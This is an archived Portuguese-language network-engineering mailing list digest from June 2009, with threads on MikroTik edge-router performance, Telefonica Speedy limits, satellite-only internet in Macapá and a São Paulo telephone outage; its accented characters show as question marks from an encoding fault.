com a Telefonica (com aquele 0800 que quando >>>> >> consegue >> >>>> falar com algu?m nunca sabem o que falam --e o que falamos tamb?m-- e >>>> >> nunca >> >>>> resolvem nada) se espanta com um atendimento como esse (que relatei >>>> >> sobre a >> >>>> Algar). >>>> >>>> -- >>>> Herbert >>>> -- >>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>> >>>> >>>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >>> >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> >> > > > > ------------------------------ > > Message: 4 > Date: Fri, 5 Jun 2009 14:21:40 -0300 > From: Herbert Faleiros > Subject: Re: [GTER] roteador de borda > To: Grupo de Trabalho de Engenharia e Operacao de Redes > > Message-ID: <200906051421.41166.herbert at scw.net.br> > Content-Type: Text/Plain; charset="iso-8859-1" > > On Fri 05 Jun 2009 08:55:33 Gustavo Santos wrote: >> Aqui, dois Mikrotiks com 155Mbits redundantes por vrrp. > > x86, mipsbe, mipsle? Caso x86 alguma placa deles ou em PC? E se n?o for > abusar > muito, ainda em x86, quais s?o os NICs utilizados (t? usando bonding), RAM > (BGP full?) e como o hardware se comporta (processamento, etc). > > -- > Herbert > > > ------------------------------ > -- > gter digest list https://eng.registro.br/mailman/listinfo/gter > > End of gter Digest, Vol 75, Issue 26 > ************************************ From maxthetor at gmail.com Mon Jun 8 14:17:55 2009 From: maxthetor at gmail.com (max _tor) Date: Mon, 8 Jun 2009 14:17:55 -0300 Subject: [GTER] Amapa/Macapa Message-ID: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> Senhores, alguem na lista de amapa/macapa, que possa dar referencia de como esta o acesso por essa cidade/estado?? Quem atende? OI/Embratel? outra? Servico precario? bom? Abracos From rubensk at gmail.com Mon Jun 8 14:55:43 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Mon, 8 Jun 2009 14:55:43 -0300 Subject: [GTER] roteador de borda In-Reply-To: References: Message-ID: <6bb5f5b10906081055y159cf89dtd981dcc740354b18@mail.gmail.com> > Quanto a capacidade do Mikrotik, atraves dos uso de routerboards, voc? > encontra varios testes de performance no site. Eu nunca consegui reproduzir a performance que eles encontraram nos testes deles, com qualquer tamanho de pacote ou configura??o (bridging/routing, conntrack on/off) E quando eu imaginava tirar a d?vida usando um equipamento espec?fico de teste (Agilent FrameScope), nenhuma Routerboard que j? testei conseguiu terminar um teste. Durante o teste falha algo e o teste n?o completa (repetidamente, em 100% das vezes). Rubens From renato.diogo at gmail.com Mon Jun 8 16:18:09 2009 From: renato.diogo at gmail.com (Renato de Oliveira Diogo) Date: Mon, 8 Jun 2009 16:18:09 -0300 Subject: [GTER] =?iso-8859-1?q?Limita=E7=F5es_t=E9cnicas_speedy=3F?= Message-ID: <724d72960906081218l25245566j780e24e0d8612b55@mail.gmail.com> Senhores alguem saberia me informar quais s?o as limita??es feitas pelo speedy, se existe limite de conex?es simult?neas, quota de download... se isso varia de produto pra produto? Atenciosamente ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br From lscrlstld at gmail.com Mon Jun 8 16:56:01 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Mon, 8 Jun 2009 16:56:01 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A__Limita=E7=F5es_t=E9cnicas_speedy=3F?= In-Reply-To: <724d72960906081218l25245566j780e24e0d8612b55@mail.gmail.com> References: <724d72960906081218l25245566j780e24e0d8612b55@mail.gmail.com> Message-ID: <452E35FF0EB240E692DE9891D37DF973@toledoPC> Solicite uma c?pia do contrato de presta??o de servi?os do acesso, o que estiver escrito ? o que vale. D? para adiantar que ? um circuito compartilhado de acesso a internet, portando divide com outros recursos finitos, logo oferece performance vari?vel. Abs > > Senhores > > alguem saberia me informar quais s?o as limita??es feitas > pelo speedy, se existe limite de conex?es simult?neas, quota > de download... > > se isso varia de produto pra produto? > > Atenciosamente > ________________________________________________ > Renato de Oliveira Diogo > > Bacharel em Ci?ncia da Computa??o > UNESP - Bauru > > LPIC1 - Linux Professional Institute Certification - N?vel 1 > > renato.diogo at gmail.com > renato.diogo at yahoo.com.br > -- > gter list https://eng.registro.br/mailman/listinfo/gter From emiliano.martins at ik1.com.br Mon Jun 8 16:56:28 2009 From: emiliano.martins at ik1.com.br (Emiliano Martins) Date: Mon, 8 Jun 2009 16:56:28 -0300 Subject: [GTER] =?iso-8859-1?q?Limita=E7=F5es_t=E9cnicas_speedy=3F?= In-Reply-To: <724d72960906081218l25245566j780e24e0d8612b55@mail.gmail.com> References: <724d72960906081218l25245566j780e24e0d8612b55@mail.gmail.com> Message-ID: <9c0c824e0906081256h687d61det37e564bf661167a6@mail.gmail.com> Renato, A ?nica limita??o que eu sei que o speedy imp?e ? a qualidade do servi?o, que, dependendo a regi?o aonde voc? se encontra ? p?ssima. Fora isso tem a chatice do speedy business pedir autentica??o a cada 2 ou 3 semanas. 2009/6/8 Renato de Oliveira Diogo > Senhores > > alguem saberia me informar quais s?o as limita??es feitas pelo speedy, > se existe limite de conex?es simult?neas, quota de download... > > se isso varia de produto pra produto? > > Atenciosamente > ________________________________________________ > Renato de Oliveira Diogo > > Bacharel em Ci?ncia da Computa??o > UNESP - Bauru > > LPIC1 - Linux Professional Institute Certification - N?vel 1 > > renato.diogo at gmail.com > renato.diogo at yahoo.com.br > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Emiliano Martins iK1 Tecnologia Ltda From renato.diogo at gmail.com Mon Jun 8 20:35:34 2009 From: renato.diogo at gmail.com (Renato de Oliveira Diogo) Date: Mon, 8 Jun 2009 20:35:34 -0300 Subject: [GTER] =?iso-8859-1?q?Limita=E7=F5es_t=E9cnicas_speedy=3F?= In-Reply-To: <9c0c824e0906081256h687d61det37e564bf661167a6@mail.gmail.com> References: <724d72960906081218l25245566j780e24e0d8612b55@mail.gmail.com> <9c0c824e0906081256h687d61det37e564bf661167a6@mail.gmail.com> Message-ID: <724d72960906081635q53dfba6ah49ae2e472211925c@mail.gmail.com> A legal... estou precisando de um acesso na empresa onde trabalho, e tem uma quantidade relativa de funcionarios (para as velocidades que s?o oferecidas), e meu medo ? alguma limita??o como limita??o de conex?es simult?neas; ou algo do tipo j? a parte do bussiness j? ? um complicador no meu caso... Grato pela ajuda []s ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br 2009/6/8 Emiliano Martins : > Renato, > A ?nica limita??o que eu sei que o speedy imp?e ? a qualidade do servi?o, > que, dependendo a regi?o aonde voc? se encontra ? p?ssima. > > Fora isso tem a chatice do speedy business pedir autentica??o a cada 2 ou 3 > semanas. > > 2009/6/8 Renato de Oliveira Diogo > >> Senhores >> >> alguem saberia me informar quais s?o as limita??es feitas pelo speedy, >> se existe limite de conex?es simult?neas, quota de download... >> >> se isso varia de produto pra produto? >> >> Atenciosamente >> ________________________________________________ >> Renato de Oliveira Diogo >> >> Bacharel em Ci?ncia da Computa??o >> UNESP - Bauru >> >> LPIC1 - Linux Professional Institute Certification - N?vel 1 >> >> renato.diogo at gmail.com >> renato.diogo at yahoo.com.br >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > > > > -- > Emiliano Martins > iK1 Tecnologia Ltda > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From Bruno at Openline.com.br Mon Jun 8 21:19:10 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Mon, 08 Jun 2009 21:19:10 -0300 Subject: [GTER] roteador de borda Message-ID: <1244506750771.Bruno@Openline.com.br> Ol? --- Rubens Kuhl escreveu: > > Quanto a capacidade do Mikrotik, atraves dos uso de routerboards, voc? > > encontra varios testes de performance no site. > > Eu nunca consegui reproduzir a performance que eles encontraram nos > testes deles, com qualquer tamanho de pacote ou configura??o > (bridging/routing, conntrack on/off) idem por aqui > E quando eu imaginava tirar a d?vida usando um equipamento espec?fico > de teste (Agilent FrameScope), nenhuma Routerboard que j? testei > conseguiu terminar um teste. Durante o teste falha algo e o teste n?o > completa (repetidamente, em 100% das vezes). interessante, eles falam que testam com algo assim. seria interessante que informassem a vers?o do routeros e/ou se a configura??o ? a default []s, !3runo Cabral From mayk.campelo at gmail.com Mon Jun 8 21:44:24 2009 From: mayk.campelo at gmail.com (Mayk Campelo) Date: Mon, 8 Jun 2009 21:44:24 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> Message-ID: <2f3f2f700906081744s33d329e5oe267d21bee00ff29@mail.gmail.com> Das grandes teles, a Embratel, Oi e Intelig est?o presentes no Amap?, qualquer uma dessa operadoras faz uso de satelite para transporte inter-backbone. No que diz respeito a Internet, nenhuma operadora oferece DSL na ?ltima milha, as ?nicas op??es s?o o acesso das operadoras de celular (vivo e tim) e acesso via r?dio ofertado por provedores locais. Os pre?os praticados pelas teles s?o altamente elevados, fora de qualquer realidade do eixo centro/sul, o mega com cir de 100% chega a custar at? R$ 8.000,00, sem falar no problema de capacidade/escalabilidade condicionada por essas empresas. O Amap? vive um momento de intensa discuss?o e busca por solu??es que viabilizem melhorias no acesso a Internet. Existem muitas cogita??es para realizar transporte fora do satelite, mas at? onde sei apenas uma ? concreta. Um grupo de empres?rios (provedores locais) startou um projeto que objetiva a implatan??o de um circuito terrestre entre o Amap? e o Par?, com alta capacidade/escalabilidade de transporte. Esse grupo de empres?rios est? prestes a mudar a radicalmente a realidade da oferta de servi?os de Internet/Telecom no estado do Amap?. Posso afirmar que ser?o duas "?ras" (em termos de comunica??o) registradas na hist?ria do Estado do Amap?: a que perdura at? os dias atuais e a que vier quando tivermos dispon?vel a infraestrutura projetada por esses empres?rios. Abra?o, -- Mayk Campelo 2009/6/8 max _tor : > Senhores, alguem na lista de amapa/macapa, que possa dar referencia de como > esta > o acesso por essa cidade/estado?? > Quem atende? OI/Embratel? outra? > Servico precario? bom? > > Abracos > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From mantunes.listas at gmail.com Mon Jun 8 16:17:16 2009 From: mantunes.listas at gmail.com (mantunes) Date: Mon, 8 Jun 2009 16:17:16 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> Message-ID: Olha, tenho um amigo que trabalha na capital segundo informa??es dele.. N?o tem banda larga em Macap?. N?o tem rede 3g a sa?da ? somente via sat?lite o delay ? de 7milisegundos tem Telemar e Oi e provedores via r?dio.. 2009/6/8 max _tor : > Senhores, alguem na lista de amapa/macapa, que possa dar referencia de como > esta > o acesso por essa cidade/estado?? > Quem atende? OI/Embratel? outra? > Servico precario? bom? > > Abracos > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- Marcio Antunes Powered by FreeBSD ================================== * Windows: "Where do you want to go tomorrow?" * Linux: "Where do you want to go today?" * FreeBSD: "Are you, guys, comming or what?" From wendersonsouza at gmail.com Mon Jun 8 18:20:03 2009 From: wendersonsouza at gmail.com (Wenderson Souza) Date: Mon, 8 Jun 2009 18:20:03 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> Message-ID: <6d3b97100906081420s34956c7bo5ce7d9960e9b795c@mail.gmail.com> Boa noite, Em Macap? estamos literalmente ilhados. Acesso apenas por satelite. Quem atende: Embratel, Oi, Intelig. Servi?o: como sempre, tudo que ? satelital nao ? 100% confi?vel. Choveu ficou lento. Pre?o: Entre 8 a 10 vezes o pre?o de onde tem acesso por fibra. Se quiser pagar 8mil no mega pode vir pra c?. Atenciosamente, Wenderson Souza e-mail: wendersonsouza at gmail.com msn: wendersonsouza at msn.com 2009/6/8 max _tor > Senhores, alguem na lista de amapa/macapa, que possa dar referencia de como > esta > o acesso por essa cidade/estado?? > Quem atende? OI/Embratel? outra? > Servico precario? bom? > > Abracos > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From herbert at scw.net.br Mon Jun 8 16:02:06 2009 From: herbert at scw.net.br (Herbert Faleiros) Date: Mon, 8 Jun 2009 16:02:06 -0300 Subject: [GTER] roteador de borda In-Reply-To: <6bb5f5b10906081055y159cf89dtd981dcc740354b18@mail.gmail.com> References: <6bb5f5b10906081055y159cf89dtd981dcc740354b18@mail.gmail.com> Message-ID: <200906081602.07021.herbert@scw.net.br> Em Seg 08 Jun 2009, ?s 14:55:43, Rubens Kuhl escreveu: > Eu nunca consegui reproduzir a performance que eles encontraram nos > testes deles, com qualquer tamanho de pacote ou configura??o > (bridging/routing, conntrack on/off) eu tamb?m n?o (em nenhuma routerboard que testei), em x86 com PC n?o tenho par?metros p/ compara??o (a ?nica informa??o que posso dar sobre isso ? seguinte: em x86 nunca tive problemas com performance, nem mesmo com v?rias e v?rias fun??es e regras que costumam "sobrecarregar" routerboards). -- Herbert From herlon at lcimt.com.br Mon Jun 8 17:39:06 2009 From: herlon at lcimt.com.br (Herlon Alcantara Matos) Date: Mon, 8 Jun 2009 16:39:06 -0400 Subject: [GTER] roteador de borda References: <6bb5f5b10906081055y159cf89dtd981dcc740354b18@mail.gmail.com> Message-ID: <337441D3E38547FEAC60D63931FDC8C2@SUporteHerlon> Rubens Agrade?o a informa??o, pois nunca fiz os testes em ambas as solu??es citadas. Utilizo as duas, mas o mikrotik n?o como router, somente como bridge em nossas redes wireless. Herlon LCI Telecom ----- Original Message ----- From: "Rubens Kuhl" To: "Herlon Alcantara Matos" ; "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Monday, June 08, 2009 1:55 PM Subject: Re: [GTER] roteador de borda > Quanto a capacidade do Mikrotik, atraves dos uso de routerboards, voc? > encontra varios testes de performance no site. Eu nunca consegui reproduzir a performance que eles encontraram nos testes deles, com qualquer tamanho de pacote ou configura??o (bridging/routing, conntrack on/off) E quando eu imaginava tirar a d?vida usando um equipamento espec?fico de teste (Agilent FrameScope), nenhuma Routerboard que j? testei conseguiu terminar um teste. Durante o teste falha algo e o teste n?o completa (repetidamente, em 100% das vezes). Rubens From thiagomespb at gmail.com Mon Jun 8 21:42:57 2009 From: thiagomespb at gmail.com (Thiago Gomes) Date: Mon, 8 Jun 2009 21:42:57 -0300 Subject: [GTER] Gerar trafego para um Roteador Message-ID: <8212cbca0906081742v28934331g53252b7f00ead3d4@mail.gmail.com> Pessoal, Estou fazendo alguns teste em dois roteadores, gostaria de saber a possibilidade de uma aplicativo em windows que eu posso gerar trafego para analise destes roteadores algo como envio de pacotes e verificar sua capacidade, os roteadores s?o vanguard 340 e um hawaei AR 18-10 Obrigado Thiago Gomes From eschoedler at viavale.com.br Mon Jun 8 23:02:22 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Mon, 8 Jun 2009 23:02:22 -0300 Subject: [GTER] Gerar trafego para um Roteador References: <8212cbca0906081742v28934331g53252b7f00ead3d4@mail.gmail.com> Message-ID: <4C12CB8A27944673B9C56654846EB771@admgaz.com.br> Iperf roda em win32... ele ? bom para gerar tr?fego. Abra?o. ----- Original Message ----- From: "Thiago Gomes" To: Sent: Monday, June 08, 2009 9:42 PM Subject: [GTER] Gerar trafego para um Roteador > Pessoal, > > Estou fazendo alguns teste em dois roteadores, gostaria de saber a > possibilidade > de uma aplicativo em windows que eu posso gerar trafego para analise > destes roteadores > algo como envio de pacotes e verificar sua capacidade, os roteadores > s?o vanguard 340 e um hawaei > AR 18-10 > > Obrigado > > Thiago Gomes > -- > gter list https://eng.registro.br/mailman/listinfo/gter From wagnerfurquim at gmail.com Mon Jun 8 22:47:21 2009 From: wagnerfurquim at gmail.com (Wagner Furquim) Date: Mon, 8 Jun 2009 22:47:21 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> Message-ID: <80F001AB-5AD9-416C-A177-81299558E405@gmail.com> Boa noite amigos, 7 milisegundos n?o, no m?nimo 400ms Abra?os, Enviado de meu iPhone Em 08/06/2009, ?s 16:17, mantunes escreveu: > Olha, > > tenho um amigo que trabalha na capital > > segundo informa??es dele.. > > N?o tem banda larga em Macap?. > N?o tem rede 3g > a sa?da ? somente via sat?lite o delay ? de 7milisegundos > tem Telemar e Oi e provedores via r?dio.. > > > 2009/6/8 max _tor : >> Senhores, alguem na lista de amapa/macapa, que possa dar referencia >> de como >> esta >> o acesso por essa cidade/estado?? >> Quem atende? OI/Embratel? outra? >> Servico precario? bom? >> >> Abracos >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > > > > -- > Marcio Antunes > Powered by FreeBSD > ================================== > * Windows: "Where do you want to go tomorrow?" > * Linux: "Where do you want to go today?" > * FreeBSD: "Are you, guys, comming or what?" > -- > gter list https://eng.registro.br/mailman/listinfo/gter From wendersonsouza at gmail.com Mon Jun 8 23:14:10 2009 From: wendersonsouza at gmail.com (Wenderson Souza) Date: Mon, 8 Jun 2009 23:14:10 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> Message-ID: <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> Boa noite, Conforme dito pelo colega Mayk, o qual conhe?o pessoalmente e tenho grande respeito pelo seu grande conhecimento nesta ?rea de Internet entre outras, existe sim este grupo de empres?rios que est? com o projeto de trazer de Bel?m para Macap? atrav?s da tecnologia a r?dio (segundo meu conhecimento) internet com velocidades maiores e/ou lat?ncias menores, trazendo assim a t?o "esperada" banda larga. Apesar de (tecnicamente falando) Macap? j? ter banda larga ( http://pt.wikipedia.org/wiki/Banda_larga), visto que qualquer conex?o que trafega acima dos 56kbps do modem discado, j? pode-se considerar banda larga. S? que as velocidades vistas nas capitais que s?o atendidas por backbones em fibra ?ptica n?o s?o tang?veis em Macap? pelo custo do link satelital ser muito alto. Querem um exemplo, Manaus, tem banda larga pelo Velox, mas j? viram o custo? Custo alto por usar backbone satelital. Seria o mesmo que aconteceria em Macap?. ( http://oivelox.novaoi.com.br/portal/site/OiVelox/menuitem.ebeac1048536fb0248de9f76f26d02a0/?vgnextoid=c0456b009fcf2110VgnVCM10000090cb200aRCRD&STATE=3|AM|Amazonas ) As operadoras de telefonia do estado do Amap? n?o t?m interesse em trazer a t?o esperada fibra ?ptica para Macap?, porque isso diminuiria seus lucros locais (com o acesso discado e com os altos pre?os de vendas de links dedicados para governo e ISPs). E necessitaria de um investimento muito alto para funcionar internamente. Apenas trazer a fibra nao resolveria o problema local, ja que nao tem infra-estrutura interna necess?ria para instalar redes xDSL. Motivo? Redes sucateadas, anal?gicas (as mesmas recebidas do sistema Telebr?s na privatiza??o), amplificadas. Apenas alguns bairros t?m URAs capazes de se instalar um DSLAM e fazer o neg?cio acontecer. O restante ? totalmente anal?gico e tem sua troca invi?vel. Assim como o Mayk trabalho em ISP e nossa cidade sofre muito com a falta de um backbone terrestre que nos interligue com o restante do brasil com lat?ncias adequadas. Hoje nossa lat?ncia m?nima em Macap? ? entre 550 ms a 600 ms, isso por culpa do acesso satelital. Ent?o a fibra nao resolveria? Sim e n?o, pois vindo a fibra poder?amos comprar links dedicados por valores menores e repassar isso para os consumidores. Velocidades maiores por pre?os menores. Mas nao teria (de imediato) o ADSL dispon?vel. Mas os ISPs via r?dio conseguiriam atender seus clientes com melhores qualidades. Rede 3G existe em Macap?, mas apenas internamente. V?deo-chamada apenas local. Passou para o sat?lite a m?gina p?ra. E aquele grupo de empres?rios ser? a salva??o? Sim e n?o, pois o monop?lio continuar?(ria) existindo sem garantias de menores pre?os para os clientes (que ? o que importa no final das contas). A salva??o, que todo mundo espera, al?m de governo, iniciativa privada e consumidores, ? mesmo a chegada do linh?o de Tucuru? em Macap?, juntamente com o mesmo vir? (segundo cl?usula licitat?ria) "cabos" de fibra ?ptica para libertar o povo amapaense desse desespero "desconectado". O problema n?mero 2 ?: quem ir? explorar esse meio f?sico? PS: Pe?o desculpas ao amigo "Max The Tor" pelo meu e-mail anterior ter sido menos "burocr?tico" e explicativo. Atenciosamente, Wenderson Souza e-mail: wendersonsouza at gmail.com msn: wendersonsouza at msn.com 2009/6/8 mantunes > Olha, > > tenho um amigo que trabalha na capital > > segundo informa??es dele.. > > N?o tem banda larga em Macap?. > N?o tem rede 3g > a sa?da ? somente via sat?lite o delay ? de 7milisegundos > tem Telemar e Oi e provedores via r?dio.. > > > 2009/6/8 max _tor : > > Senhores, alguem na lista de amapa/macapa, que possa dar referencia de > como > > esta > > o acesso por essa cidade/estado?? > > Quem atende? OI/Embratel? outra? > > Servico precario? bom? > From henrique.holschuh at ima.sp.gov.br Tue Jun 9 10:03:43 2009 From: henrique.holschuh at ima.sp.gov.br (Henrique de Moraes Holschuh) Date: Tue, 09 Jun 2009 10:03:43 -0300 Subject: [GTER] =?iso-8859-1?q?OT=3A_STFC_Telef=F4nica_est=E1_fora_em_todo?= =?iso-8859-1?q?_o_estado_de_SP_=3F?= Message-ID: <4A2E5DAF.9010505@ima.sp.gov.br> Algo de ruim aconteceu, e n?o foi na Dinamarca... :( Acabamos de ser informados que n?o foi s? nosso tronco de telefonia que est? sem servi?o, ? o estado inteiro (o que n?o temos como verificar, evidentemente). Algu?m tem algum dado a respeito? A coisa est? preta, nem o 190 funciona... por isso temos backup por rede celular, mas mesmo assim... -- Henrique de Moraes Holschuh IM@ - Inform?tica de Munic?pios Associados Projetos Especiais TEL +55-19-3739-6055/CEL +55-19-9293-9464 Antes de imprimir, lembre-se de seu compromisso com o Meio Ambiente e do custo que voc? pode evitar. From rubensk at gmail.com Tue Jun 9 10:14:27 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Tue, 9 Jun 2009 10:14:27 -0300 Subject: [GTER] =?iso-8859-1?q?OT=3A_STFC_Telef=F4nica_est=E1_fora_em_todo?= =?iso-8859-1?q?_o_estado_de_SP_=3F?= In-Reply-To: <4A2E5DAF.9010505@ima.sp.gov.br> References: <4A2E5DAF.9010505@ima.sp.gov.br> Message-ID: <6bb5f5b10906090614q5f96fdb9q1cf1b7b1dba9a40d@mail.gmail.com> Eles tem passado essa informa??o, mas agora que eles tem informado isso, quase tudo est? normalizado. Rubens 2009/6/9 Henrique de Moraes Holschuh : > Algo de ruim aconteceu, e n?o foi na Dinamarca... :( > > Acabamos de ser informados que n?o foi s? nosso tronco de telefonia que est? > sem servi?o, ? o estado inteiro (o que n?o temos como verificar, > evidentemente). > > Algu?m tem algum dado a respeito? > > A coisa est? preta, nem o 190 funciona... ?por isso temos backup por rede > celular, mas mesmo assim... > > -- > Henrique de Moraes Holschuh > IM@ - Inform?tica de Munic?pios Associados > Projetos Especiais > TEL +55-19-3739-6055/CEL +55-19-9293-9464 > > Antes de imprimir, lembre-se de seu compromisso com o Meio Ambiente > e do custo que voc? pode evitar. > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From marcelorossi at gmail.com Tue Jun 9 10:11:56 2009 From: marcelorossi at gmail.com (Marcelo/Porks) Date: Tue, 9 Jun 2009 10:11:56 -0300 Subject: [GTER] =?iso-8859-1?q?OT=3A_STFC_Telef=F4nica_est=E1_fora_em_todo?= =?iso-8859-1?q?_o_estado_de_SP_=3F?= In-Reply-To: <4A2E5DAF.9010505@ima.sp.gov.br> References: <4A2E5DAF.9010505@ima.sp.gov.br> Message-ID: <76dec37a0906090611o5f28e0d3i37f3ad204504c1d8@mail.gmail.com> Aqui (e em outros lugares perto de Ribeir?o at? Prudente) n?o conseguimos fazer liga??es pelas E1, mas recebemos normalmente. o site da telefonica (http://www.telefonica.com.br/) encontra-se fora (10:11 - 09/06): Vignette Portal This system is unavailable. Please contact the administrator for details. 2009/6/9 Henrique de Moraes Holschuh : > Algo de ruim aconteceu, e n?o foi na Dinamarca... :( > > Acabamos de ser informados que n?o foi s? nosso tronco de telefonia que est? > sem servi?o, ? o estado inteiro (o que n?o temos como verificar, > evidentemente). > > Algu?m tem algum dado a respeito? > > A coisa est? preta, nem o 190 funciona... ?por isso temos backup por rede > celular, mas mesmo assim... > > -- > Henrique de Moraes Holschuh > IM@ - Inform?tica de Munic?pios Associados > Projetos Especiais > TEL +55-19-3739-6055/CEL +55-19-9293-9464 > > Antes de imprimir, lembre-se de seu compromisso com o Meio Ambiente > e do custo que voc? pode evitar. > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- Marcelo Rossi "This e-mail is provided "AS IS" with no warranties, and confers no rights." From dverzolla at fcl.com.br Tue Jun 9 09:52:19 2009 From: dverzolla at fcl.com.br (David Verzolla) Date: Tue, 9 Jun 2009 09:52:19 -0300 Subject: [GTER] Telefonica fora? Message-ID: <9D88AFD4E5500C4181300C8DACE8800C755197@corpexch-01.corp.com> Lista, Algu?m est? com problemas com a telef?nica hoje? Especificamente E1s e LAN2LAN? Regi?o central de SP. ???? David Verzolla [ Coordenador T?cnico de TI ] [ TI - Funda??o C?sper L?bero ] dverzolla at fcl.com.br From gustkiller at gmail.com Tue Jun 9 09:22:30 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Tue, 9 Jun 2009 09:22:30 -0300 Subject: [GTER] roteador de borda In-Reply-To: <337441D3E38547FEAC60D63931FDC8C2@SUporteHerlon> References: <6bb5f5b10906081055y159cf89dtd981dcc740354b18@mail.gmail.com> <337441D3E38547FEAC60D63931FDC8C2@SUporteHerlon> Message-ID: <276fbe8b0906090522u3c6f8d16rce345033376a22f8@mail.gmail.com> Interessante ? que a maioria das pessoas que utilizam o mikrotik ? para algo wireless ( ap, cliente). Sendo que o nome do produto ? " Mikrotik RouterOS" e que a principal fun??o dele ? ser um router. 2009/6/8 Herlon Alcantara Matos > Rubens > > Agrade?o a informa??o, pois nunca fiz os testes em ambas as solu??es > citadas. > > Utilizo as duas, mas o mikrotik n?o como router, somente como bridge em > nossas redes wireless. > > Herlon > LCI Telecom > > ----- Original Message ----- From: "Rubens Kuhl" > To: "Herlon Alcantara Matos" ; "Grupo de Trabalho de > Engenharia e Operacao de Redes" > Sent: Monday, June 08, 2009 1:55 PM > Subject: Re: [GTER] roteador de borda > > > Quanto a capacidade do Mikrotik, atraves dos uso de routerboards, voc? >> encontra varios testes de performance no site. >> > > Eu nunca consegui reproduzir a performance que eles encontraram nos > testes deles, com qualquer tamanho de pacote ou configura??o > (bridging/routing, conntrack on/off) > > E quando eu imaginava tirar a d?vida usando um equipamento espec?fico > de teste (Agilent FrameScope), nenhuma Routerboard que j? testei > conseguiu terminar um teste. Durante o teste falha algo e o teste n?o > completa (repetidamente, em 100% das vezes). > > > Rubens > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From matheusbrat at gmail.com Tue Jun 9 01:06:19 2009 From: matheusbrat at gmail.com (Matheus Bratfisch) Date: Tue, 9 Jun 2009 01:06:19 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> Message-ID: <3e920d2f0906082106i785060ecked35c9bfa057e6f8@mail.gmail.com> Boa noite, N?o estou por dentro das atuais situa??es da regi?o, mas para os provedores da regi?o junto a homologa??o da internet via rede el?trica ser? um avan?o para a regi?o. N?o? Att, -- Matheus (X-warrior) Bratfisch. http://matbra.com From marco at lpnet.com.br Tue Jun 9 10:27:53 2009 From: marco at lpnet.com.br (Marco Aurelio da Silva) Date: Tue, 09 Jun 2009 10:27:53 -0300 Subject: [GTER] =?iso-8859-1?q?OT=3A_STFC_Telef=F4nica_est=E1_fora_em_todo?= =?iso-8859-1?q?_o_estado_de_SP_=3F?= In-Reply-To: <76dec37a0906090611o5f28e0d3i37f3ad204504c1d8@mail.gmail.com> References: <4A2E5DAF.9010505@ima.sp.gov.br> <76dec37a0906090611o5f28e0d3i37f3ad204504c1d8@mail.gmail.com> Message-ID: <4A2E6359.3090603@lpnet.com.br> Aqui na regi?o de Bauru, toda telefonia esta fora tamb?m. Detalhe, n?o s? para quem tem E1, todos os telefones est?o off. [ ]s Marco From webgeo at gmail.com Tue Jun 9 10:57:11 2009 From: webgeo at gmail.com (Giovane Heleno) Date: Tue, 9 Jun 2009 10:57:11 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica In-Reply-To: References: <4A280083.9070207@cyberweb.com.br> Message-ID: Opa... tenho a reclamar do pessoal da CTBC tamb?m n?o. O Epafras e a equipe do COR j? perderam o cabelo com problemas que tive, e sempre tiveram empenho em resolv?-los de forma mais r?pida. Mesmo quando o problema n?o era deles, davam um apoio. A Embratel tamb?m tem qualidade no atendimento, mas acho um pouco "rob?tico" eu acho, n?o vejo o mesmo empenho em ajudar o cliente. Agora... Telef?nica... J? aconteceu v?rios casos. Um deles, ? do nosso consultor, que foi mandado embora. Ficamos sem contato corporativo. Ligava l?, e ninguem me passava pra alguem nos atender. A? liguei no 0800 de grandes empresas. Informei que queria contratar um link de 30Mb. Me passaram para 8 (isso mesmo, oito pessoas), numa esp?cie de ping-pong virtual... rss A liga??o acabou caindo e n?o resolvemos o 